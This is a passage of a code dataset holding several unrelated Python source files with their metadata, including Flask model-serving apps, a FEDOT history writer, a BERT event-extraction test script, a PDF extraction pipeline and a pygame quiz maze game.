response\n\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef webprint():\n arr = train_model()\n\n # load model\n filename = 'finalized_model.sav'\n loaded_model = pickle.load(open(filename, 'rb'))\n result = loaded_model.score(arr[0], arr[1])\n print(result)\n # make prediction\n li = []\n\n atemp = request.form.get('att')\n comp = request.form.get('cmp')\n perc = request.form.get('pct')\n yarsd = request.form.get('yds')\n yardsatt = request.form.get('ypa')\n inter = request.form.get('inter')\n interper = request.form.get('intpct')\n longth = request.form.get('lg')\n sack = request.form.get('sack')\n loss = request.form.get('loss')\n rate = request.form.get('rate')\n tchdper = request.form.get('tprc')\n\n li.append(atemp)\n li.append(comp)\n li.append(perc)\n li.append(yarsd)\n li.append(yardsatt)\n li.append(tchdper)\n li.append(inter)\n li.append(interper)\n li.append(longth)\n li.append(sack)\n li.append(loss)\n li.append(rate)\n mat = np.array(li)\n\n x = np.array(['1.1', '2.2', '3.3'])\n y = x.astype(np.float)\n\n mat_con = mat.astype(np.float)\n\n # print(loaded_model.predict([mat_con]))\n\n\n if request.method =='POST':\n # print(loaded_model.predict([y])) \n print(mat_con)\n model = load_model(\"td_predict.h5\")\n\n\n val = model.predict([[mat_con]])\n data = {\"Predicted Touchdowns\":str(val), \"Model Type\": \"Sequential\",\"Loaded Model\":\"td_predict.h5\", \"Epochs\": \"500\"}\n print(data)\n\n response = app.response_class(\n response=json.dumps(data),\n status=200,\n mimetype='application/json'\n )\n return response\n\n\n \n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)", "sub_path": "final-master/final/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3113, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 43, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, 
"usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request.method", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "keras.models.load_model", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 127, "usage_type": "call"}]} +{"seq_id": "262644152", "text": "import csv\nimport os\nfrom typing import (Any, List)\n\nfrom 
fedot.core.utils import default_fedot_data_dir\n\n\ndef write_composer_history_to_csv(historical_chains: List[Any], file='history.csv'):\n history_dir = os.path.join(default_fedot_data_dir(), 'composing_history')\n file = f'{history_dir}/{file}'\n if not os.path.isdir(history_dir):\n os.mkdir(history_dir)\n write_header_to_csv(file)\n i = 0\n for gen_num, gen_chains in enumerate(historical_chains):\n for chain in gen_chains:\n add_history_to_csv(file, chain.fitness, len(chain.nodes), chain.depth, i, gen_num)\n i += 1\n\n\ndef write_header_to_csv(f):\n with open(f, 'w', newline='') as file:\n writer = csv.writer(file, quoting=csv.QUOTE_ALL)\n writer.writerow(['num', 'generation', 'fitness', 'num_of_models', 'depth'])\n\n\ndef add_history_to_csv(f, fitness: float, models_num: int, depth: int, num: int = None, generation: int = None):\n with open(f, 'a', newline='') as file:\n writer = csv.writer(file, quoting=csv.QUOTE_ALL)\n writer.writerow([num, generation, fitness, models_num, depth])\n", "sub_path": "fedot/core/composer/write_history.py", "file_name": "write_history.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 8, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "fedot.core.utils.default_fedot_data_dir", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 12, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 23, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 23, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 29, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "246372721", "text": "# model test\nimport os\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom bert_serving.client import BertClient\nfrom bratreader.repomodel import RepoModel\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom model_com import create_base_network, get_events, fit_on_data, test_on_data, get_events_in_mention\n\n\ndef testing(DIR_DATA): \n print('\n\nTesting {}>>>\ndata importing:'.format(DIR_DATA))\n TASK_NAME = DIR_DATA\n NAME_DATA_FILE = TASK_NAME+'_data_import'+'.save'\n DIR_MODEL = './save/'\n file_model_trig = DIR_MODEL + TASK_NAME +'_model_trigger.pkl'\n file_model_arg = DIR_MODEL + TASK_NAME + '_model_arg.pkl'\n\n triggers, vec_trig, label_trig, args, vec_arg, label_arg = [], [], [], [], [], []\n try:\n triggers, vec_trig, label_trig, args, vec_arg, label_arg = joblib.load(NAME_DATA_FILE)\n except:\n ANN_FILEs = []\n DIR_ALL_FILES = os.listdir(DIR_DATA)\n for file_name in DIR_ALL_FILES:\n if file_name.split('.')[-1] == 'txt':\n ANN_FILEs.append(file_name[:-4])\n corpus = RepoModel(DIR_DATA) # load corpus\n bc = BertClient(ip='127.0.0.1', port=8701, port_out=8702, show_server_config=True) # bert model as service\n for ANN_FILE in ANN_FILEs:\n doc = corpus.documents[ANN_FILE] # get document with key\n ttriggers, tvec_trig, tlabel_trig, targs, tvec_arg, tlabel_arg, label_arg_for_each_trig = 
get_events_in_mention(doc, bc)\n triggers.extend(ttriggers)\n vec_trig.extend(tvec_trig)\n label_trig.extend(tlabel_trig)\n args.extend(targs)\n vec_arg.extend(tvec_arg)\n label_arg.extend(tlabel_arg)\n print('trigs:', len(vec_trig), 'args:', len(vec_arg))\n joblib.dump([triggers, vec_trig, label_trig, args, vec_arg, label_arg], NAME_DATA_FILE)\n\n \n X_train, X_test, Y_train, Y_test = train_test_split(vec_trig, label_trig, random_state=0)\n print('='*65,'\\n>>trigger model testing:')\n model_trig, encoder_trig = joblib.load(file_model_trig)\n acc = test_on_data(model_trig, encoder_trig, vec_trig, label_trig, DIR_DATA, en_verbose = 1)\n print('triggers extraction accuracy: {}'.format(acc))\n \n X_train, X_test, Y_train, Y_test = train_test_split(vec_arg, label_arg, random_state=0)\n print('='*65,'\\n>>argument model testing:')\n model_arg, encoder_arg = joblib.load(file_model_arg)\n acc = test_on_data(model_arg, encoder_arg, vec_arg, label_arg, DIR_DATA, en_verbose = 1)\n print('arguements extraction accuracy: {}'.format(acc))\n\n\nDIR_DATAs = ['data_ACE_Chinese']\nfor DIR_DATA in DIR_DATAs:\n testing(DIR_DATA)\n\n \n\n", "sub_path": "model_test.py", "file_name": "model_test.py", "file_ext": "py", "file_size_in_byte": 2701, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.externals.joblib.load", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 22, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "bratreader.repomodel.RepoModel", "line_number": 29, "usage_type": "call"}, {"api_name": "bert_serving.client.BertClient", "line_number": 30, "usage_type": "call"}, {"api_name": "model_com.get_events_in_mention", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 41, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 46, "usage_type": "name"}, {"api_name": "model_com.test_on_data", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 52, "usage_type": "name"}, {"api_name": "model_com.test_on_data", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "337179337", "text": "import sys\nimport time\nimport glob\nimport os\nimport argparse\nimport Extractor as extractor\nimport ConfigPaths as config\nimport CrossReference as crossref\nimport TextWriter as text_writer\nfrom DatabaseFunctionalityModules.DatabaseConnection import add_data\nfrom DatabaseFunctionalityModules.ID_Fixer import fix_pub_and_author_id\nfrom Authors import build_author_list\n\ninput_dir = os.path.join(os.getcwd(), 'inputs/')\noutput_dir = os.path.join(os.getcwd(), 'outputs/')\npdffigures2_dir = config.pdffigures2_dir\nthread_count = config.thread_count\npdfs_are_main_pubs = True\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', '--secondary', help='PDF Files have some secondary publications', action='store_true')\n args = 
parser.parse_args()\n print(args)\n\n if args.secondary:\n print("PDF Files are not all mains or are secondaries")\n pdfs_are_main_pubs = False\n\n else:\n print("PDF Files are mains")\n pdfs_are_main_pubs = True\n\n init_start = time.time()\n\n is_ready_to_run = extractor.check_resources()\n\n if is_ready_to_run:\n # remove spaces from names of PDFs, since spaces cause pdffigures2 to skip the pdf\n os.chdir(input_dir)\n for file in glob.glob("*.pdf"):\n extractor.remove_space(file)\n\n print("GROBID extracting text, metadata and references")\n try:\n extractor.data_extractor(input_dir, output_dir)\n except Exception as e:\n print(e)\n sys.exit("GROBID encountered an error")\n\n print("PDFFigures2.0 extracting figures and figure captions")\n\n try:\n extractor.extract_figures(input_dir, output_dir, pdffigures2_dir, thread_count)\n except Exception as e:\n print(e)\n sys.exit("PDFFigures encountered an error")\n\n print("Parsing XML and JSON Files")\n try:\n devices = extractor.parse_output_files(output_dir)\n except Exception as e:\n print(e)\n sys.exit("Parser encountered an error")\n\n connections = {}\n authors = []\n if config.should_init_crossrefs:\n start = time.time()\n connections = crossref.initialize_connections(devices, pdfs_are_main_pubs)\n finish = time.time()\n print("Initialized Connections in %f seconds" % (finish - start))\n if config.add_to_db:\n authors = build_author_list(devices)\n add_data(devices, connections, authors, pdfs_are_main_pubs)\n fix_pub_and_author_id()\n if config.writeToFile:\n start = time.time()\n text_writer.writeFiles(devices, connections, authors)\n finish = time.time()\n print("Wrote Files in %f seconds" % (finish - start))\n\n extractor.clean_output_folder(output_dir)\n finish = time.time()\n print("---------- Total Time Taken: %f ---------------------" % (finish - init_start))\n", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2962, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "ConfigPaths.pdffigures2_dir", "line_number": 16, "usage_type": "attribute"}, {"api_name": "ConfigPaths.thread_count", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "Extractor.check_resources", "line_number": 38, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 42, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 43, "usage_type": "call"}, {"api_name": "Extractor.remove_space", "line_number": 44, "usage_type": "call"}, {"api_name": "Extractor.data_extractor", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 51, "usage_type": "call"}, {"api_name": "Extractor.extract_figures", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 59, "usage_type": "call"}, {"api_name": "Extractor.parse_output_files", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.exit",
"line_number": 66, "usage_type": "call"}, {"api_name": "ConfigPaths.should_init_crossrefs", "line_number": 70, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 71, "usage_type": "call"}, {"api_name": "CrossReference.initialize_connections", "line_number": 72, "usage_type": "call"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "ConfigPaths.add_to_db", "line_number": 75, "usage_type": "attribute"}, {"api_name": "Authors.build_author_list", "line_number": 76, "usage_type": "call"}, {"api_name": "DatabaseFunctionalityModules.DatabaseConnection.add_data", "line_number": 77, "usage_type": "call"}, {"api_name": "DatabaseFunctionalityModules.ID_Fixer.fix_pub_and_author_id", "line_number": 78, "usage_type": "call"}, {"api_name": "ConfigPaths.writeToFile", "line_number": 79, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "TextWriter.writeFiles", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "Extractor.clean_output_folder", "line_number": 85, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "31583973", "text": "import pygame as pg\r\nimport sys\r\nfrom os import path\r\nfrom settings import *\r\nfrom sprites import *\r\nfrom tilemap import *\r\nimport json\r\nimport random\r\n\r\n\r\nclass Game(Player):\r\n def __init__(self, loop, file=\"maths.json\"):\r\n self.loop = loop\r\n pg.init()\r\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\r\n self.display = self.screen # for menu screen\r\n pg.display.set_caption(TITLE)\r\n self.clock = pg.time.Clock()\r\n pg.key.set_repeat(500, 100)\r\n self.question = -1\r\n self.game_over = False\r\n self.load_data(file)\r\n self.show_question = True\r\n self.font = pg.font.Font('freesansbold.ttf', 32)\r\n self.score_value = 0\r\n self.timer = 0\r\n self.point_coords = []\r\n self.correct_answer = 0\r\n self.countdown = 15\r\n self.new()\r\n\r\n game_over_image = pg.image.load(path.join('assets', 'gameoverscreen.png'))\r\n\r\n def load_data(self, file=\"maths.json\"):\r\n game_folder = path.dirname(__file__)\r\n self.map = Map(path.join(game_folder, 'map.txt'))\r\n with open(file) as load_questions:#opens and then closes json file after usage.\r\n self.questions = json.load(load_questions)\r\n\r\n def new(self):\r\n # initialize all variables and do all the setup for a new game\r\n self.all_sprites = pg.sprite.Group()\r\n self.walls = pg.sprite.Group()\r\n self.points = pg.sprite.Group()\r\n self.point_list = [Point(self, 0), Point(self, 1), Point(self, 2)]\r\n\r\n for row, tiles in enumerate(self.map.data):\r\n for col, tile in enumerate(tiles):\r\n if tile == '1':\r\n Wall(self, col, row)\r\n if tile == 'P':\r\n self.player = Player(self, col, row)\r\n\r\n if tile == 'D':\r\n self.point_coords.append((col, row))\r\n\r\n print(self.point_coords)\r\n # self.camera = Camera(self.map.width, self.map.height)\r\n #self.playing = True\r\n self.new_question()\r\n\r\n def tick(self):\r\n # game loop - set self.playing = False to end the\r\n self.dt = self.clock.tick(FPS) / 1000\r\n\r\n self.timer += self.dt\r\n self.events()\r\n self.update()\r\n self.draw()\r\n\r\n def quit(self):\r\n pg.quit()\r\n sys.exit()\r\n\r\n def update(self):\r\n # update portion of the game loop\r\n if self.game_over is True:\r\n pass\r\n else:\r\n self.all_sprites.update()\r\n # self.camera.update(self.player) # can put any sprite you want for 
camera to track\r\n\r\n        if self.show_question:\r\n            # putting it in show_question allows the user to know the right answer even after the game has finished\r\n            if self.countdown <= 0:\r\n                # update question screen\r\n                pass\r\n            else:\r\n                # draw answer\r\n\r\n\r\n                self.new_question()\r\n\r\n                # show a new question after 0.5 seconds\r\n                pass\r\n\r\n    def draw_grid(self):\r\n        for x in range(0, WIDTH, TILESIZE):\r\n            pg.draw.line(self.screen, BLACK, (x, 0), (x, HEIGHT))\r\n        for y in range(0, HEIGHT, TILESIZE):\r\n            pg.draw.line(self.screen, BLACK, (0, y), (WIDTH, y))\r\n\r\n    def draw_question(self):\r\n        current_question = self.questions["questions"][self.questions["order"][self.question]]["question"]\r\n        answers = self.questions["questions"][self.questions["order"][self.question]]["answer"]\r\n        questions_text = self.font.render(current_question, True, WHITE)\r\n        self.screen.blit(questions_text, (WIDTH // 2 - questions_text.get_width()//2, 0))\r\n        answers = answers[3 - self.correct_answer:3] + answers[0:3 - self.correct_answer] # randomizes the answer selection, self.correct_answer = correct index\r\n        for answer in range(len(answers)):\r\n            answers_text = self.font.render(answers[answer], True, WHITE)\r\n            self.screen.blit(answers_text, (answer * WIDTH // len(answers) + 100, HEIGHT - TILESIZE * 2))\r\n        print(answers)\r\n\r\n\r\n    def new_question(self):\r\n        self.show_question = True\r\n        self.question += 1 # "order" in json will go up by one.\r\n        self.correct_answer = random.randrange(3)\r\n        current_choice = random.sample(self.point_coords, 3)\r\n        for x in range(3):\r\n            self.point_list[x].move_point(current_choice[x])\r\n\r\n    def next_question(self, choice):\r\n        if self.show_question:\r\n            self.show_question = False\r\n            if choice == self.correct_answer:\r\n                self.score_value += 1\r\n                self.countdown += 5\r\n            else:\r\n                self.score_value -= 1\r\n            print(self.score_value)\r\n\r\n\r\n    def draw(self):\r\n\r\n        if self.countdown <= 0 and self.show_question is True or self.game_over is True:\r\n            finalscore = self.font.render(str(self.score_value), True, YELLOW)\r\n\r\n            self.screen.blit(self.game_over_image, [0, 0])\r\n            self.screen.blit(finalscore, [400, 500]) # MOVE TO THE CORRECT POSITION\r\n            self.game_over = True\r\n\r\n\r\n        else:\r\n            self.screen.fill(BGCOLOR)\r\n            self.draw_grid()\r\n            for sprite in self.all_sprites:\r\n                # self.screen.blit(sprite.image, self.camera.apply(sprite))\r\n                self.screen.blit(sprite.image, sprite)\r\n                # iterates over each sprite, applying the transformation to each one.\r\n            self.draw_UI()\r\n        pg.display.flip()\r\n\r\n    def draw_UI(self):\r\n        # countdown timer\r\n\r\n        self.countdown -= self.dt\r\n        displaycountdown = math.trunc(self.countdown)\r\n        # score pointer\r\n        text = self.font.render('Score: ' + str(self.score_value), True, GREEN)\r\n        textRect = text.get_rect()\r\n        countdowntext = self.font.render(str(displaycountdown), True, GREEN)\r\n\r\n        pg.draw.rect(self.screen, BLACK, (0, 0, WIDTH, TILESIZE * 3))\r\n        pg.draw.rect(self.screen, BLACK, (0, HEIGHT - TILESIZE * 3, WIDTH, TILESIZE * 3))\r\n        pg.draw.rect(self.screen, BLUE, (0, HEIGHT - TILESIZE * 3, 200, 200))\r\n        pg.draw.rect(self.screen, RED, (400, HEIGHT - TILESIZE * 3, 200, 200))\r\n        pg.draw.rect(self.screen, LIGHTGREY, (750, HEIGHT - TILESIZE * 3, 200, 200))\r\n\r\n        self.screen.blit(text, textRect)\r\n        self.screen.blit(countdowntext, [980, 1])\r\n\r\n        if self.show_question:\r\n            # draw the question\r\n            self.draw_question()\r\n        else:\r\n            # draws correct answer\r\n            pass\r\n\r\n    def events(self):\r\n        # catch all events here\r\n        for 
event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n self.quit()\r\n elif event.type == pg.KEYDOWN:\r\n if event.key == pg.K_ESCAPE:\r\n self.quit()\r\n elif event.key == pg.K_RETURN and self.game_over is True:\r\n self.loop.state = \"menu\"\r\n", "sub_path": "mazee.py", "file_name": "mazee.py", "file_ext": "py", "file_size_in_byte": 7021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.init", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "name"}, {"api_name": "json.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 101, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 118, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 119, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 166, "usage_type": "call"}, {"api_name": 
"pygame.draw", "line_number": 166, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 182, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.K_RETURN", "line_number": 188, "usage_type": "attribute"}]} +{"seq_id": "860806", "text": "import image_recognition\nimport json\nimport base64\nimport cv2\nfrom flask import Flask\nfrom flask import request\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/imageRecognition', methods=['POST'])\ndef image_recog():\n print(request.json)\n \n img_base64 = request.json['image']\n img = base64.b64decode(img_base64)\n bb=image_recognition.ir.img_rec(img)\n return json.dumps({'result': bb})\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n f.save('/tmp/tmp.jpg')\n img = cv2.imread('/tmp/tmp.jpg')\n bb=image_recognition.ir.img_rec(img)\n\n return json.dumps({'result': bb})\n return 'Hello, World!'\n\n", "sub_path": "tools/image_recognition_http.py", "file_name": "image_recognition_http.py", "file_ext": "py", "file_size_in_byte": 781, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 19, "usage_type": "call"}, {"api_name": "image_recognition.ir.img_rec", "line_number": 20, "usage_type": "call"}, {"api_name": "image_recognition.ir", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 29, "usage_type": "call"}, {"api_name": "image_recognition.ir.img_rec", "line_number": 30, "usage_type": "call"}, {"api_name": "image_recognition.ir", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "106153694", "text": "import math\nimport csv\nimport os\nimport shutil\nimport json\nimport enum\nfrom glob import glob\n\nfrom os.path import join as _join\nfrom os.path import exists as _exists\n\nfrom copy import deepcopy\nfrom collections import Counter\n\n# non-standard\nimport jsonpickle\nimport numpy as np\nimport pandas as pd\nimport multiprocessing\n\n# 
wepppy\nfrom wepppy.landcover import LandcoverMap\n\nfrom wepppy.all_your_base import isfloat, isint, YearlessDate, probability_of_occurrence\n\nfrom wepppy.wepp import Element\nfrom wepppy.climates.cligen import ClimateFile\n\nfrom wepppy.watershed_abstraction import SlopeFile\n\n# wepppy submodules\nfrom wepppy.nodb.log_mixin import LogMixin\nfrom wepppy.nodb.base import NoDbBase\nfrom wepppy.nodb.mods import RangelandCover\nfrom wepppy.nodb.watershed import Watershed\nfrom wepppy.nodb.soils import Soils\nfrom wepppy.nodb.topaz import Topaz\nfrom wepppy.nodb.climate import Climate\n\nfrom wepppy.nodb.mods import Baer\nfrom wepppy.nodb.wepp import Wepp\n\n# Copyright (c) 2016-2018, University of Idaho\n# All rights reserved.\n#\n# Roger Lew (rogerlew@gmail.com)\n#\n# The project described was supported by NSF award number IIA-1301792\n# from the NSF Idaho EPSCoR Program and by the National Science Foundation.\n\n# standard library\nimport os\nimport math\nfrom enum import IntEnum\nfrom os.path import join as _join\nfrom os.path import exists as _exists\nfrom os.path import split as _split\n\nfrom subprocess import Popen, PIPE\nimport multiprocessing\nfrom concurrent.futures import ThreadPoolExecutor, 